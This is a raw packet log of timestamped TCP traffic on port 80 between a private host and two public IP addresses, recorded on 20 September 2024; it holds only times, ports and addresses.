                                                              Sep 20, 2024 12:00:13.289483070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289493084 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289498091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289514065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289530993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289535046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289556980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289556980 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289573908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289589882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289607048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289613962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289633036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289634943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289649963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289664984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289680004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289690018 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289696932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289707899 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289721966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289736032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289740086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289755106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289769888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289784908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289793015 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289810896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289813995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289836884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289853096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289868116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289872885 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289885044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289892912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289901972 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289916992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289932013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289938927 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289949894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289958000 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.289966106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.289983034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290004015 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290019989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290033102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290056944 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290071964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290086985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290096998 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290102959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290117979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290132046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290132999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290148973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290150881 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290163994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290179014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290189028 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290194988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290210962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290222883 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290234089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290247917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290247917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290263891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290280104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290294886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290302992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290312052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290318966 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290328026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290343046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290350914 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290359020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290374041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290389061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290397882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290414095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290417910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290431023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290446043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290463924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290468931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290479898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290488958 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290498018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290513992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290529013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290533066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290544033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290553093 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290560961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290575981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290591002 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290596962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290606976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290616035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290623903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290640116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290646076 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290656090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290672064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290687084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290693045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290704012 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290714025 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290899038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290911913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290925980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290936947 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290941954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290955067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290957928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290973902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.290978909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.290990114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291006088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291014910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291021109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291043043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291047096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291069984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291085005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291100025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291107893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291125059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291127920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291141987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291157007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291172028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291182041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291189909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291201115 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291207075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291223049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291229963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291238070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291254997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291269064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.291279078 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.291292906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.335716009 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.378937960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378961086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378968954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378978014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378984928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378992081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.378999949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379007101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379014015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379020929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379028082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379034996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379044056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379050016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379059076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.379199028 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380722046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380744934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380760908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380775928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380789995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380790949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380800962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380806923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380824089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380831003 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380840063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380868912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380871058 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380886078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380902052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380917072 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380925894 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380933046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380948067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380949020 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380964994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380971909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.380984068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.380999088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381011009 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381016016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381055117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381098986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381114960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381129980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381145000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381153107 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381165028 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381165028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381181002 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381195068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381211042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381218910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381237030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381242990 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.381256104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.381299019 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:14.482770920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:14.488754034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.856868982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.857656002 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:14.862931967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.963140965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.963170052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.963186979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:14.963242054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:15.007668972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:33.246917963 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:33.252008915 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:33.252094030 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:33.252152920 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:33.256969929 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:33.497466087 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:33.497751951 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:34.136702061 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136718988 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136727095 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136735916 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136745930 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136755943 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136765957 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136778116 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136791945 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136797905 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.136804104 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.136857986 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.141638994 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.141668081 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.141720057 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.358134031 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358150959 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358161926 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358171940 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358182907 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358226061 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.358226061 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.358408928 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358448029 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358458042 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358463049 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.358488083 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358499050 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.358500957 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.358546019 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.359467983 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.359499931 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.359510899 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.359545946 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.359591007 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.359601021 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.359631062 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.360531092 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.360575914 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.360585928 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.360589981 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.360596895 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.360621929 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.360625029 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.360666990 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.361016989 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.361059904 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.361103058 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.363221884 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.413862944 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.579205990 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579246998 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579257011 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579266071 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579277992 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579288006 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579293013 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.579298019 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579309940 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579320908 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579325914 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.579336882 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.579348087 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.579364061 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.579397917 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.580164909 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580178976 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580189943 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580200911 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580210924 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580224037 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580223083 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.580250978 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.580271959 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.580862999 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580874920 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580883980 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.580936909 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.581099033 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581125021 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581134081 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581146955 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.581182957 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.581475973 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581486940 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581496954 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581533909 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.581793070 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581804991 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581814051 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.581842899 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.581868887 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.582499981 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582523108 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582573891 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.582609892 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582619905 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582631111 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582640886 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.582662106 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.582686901 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.583808899 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.583849907 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.583861113 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.583873987 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.583883047 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.583889961 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.583914042 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.584825993 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.584872007 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.584875107 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.584882975 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.584928989 CEST4972580192.168.2.5202.79.173.4
                                                              Sep 20, 2024 12:00:34.800276041 CEST8049725202.79.173.4192.168.2.5
                                                              Sep 20, 2024 12:00:34.800311089 CEST8049725202.79.173.4192.168.2.5
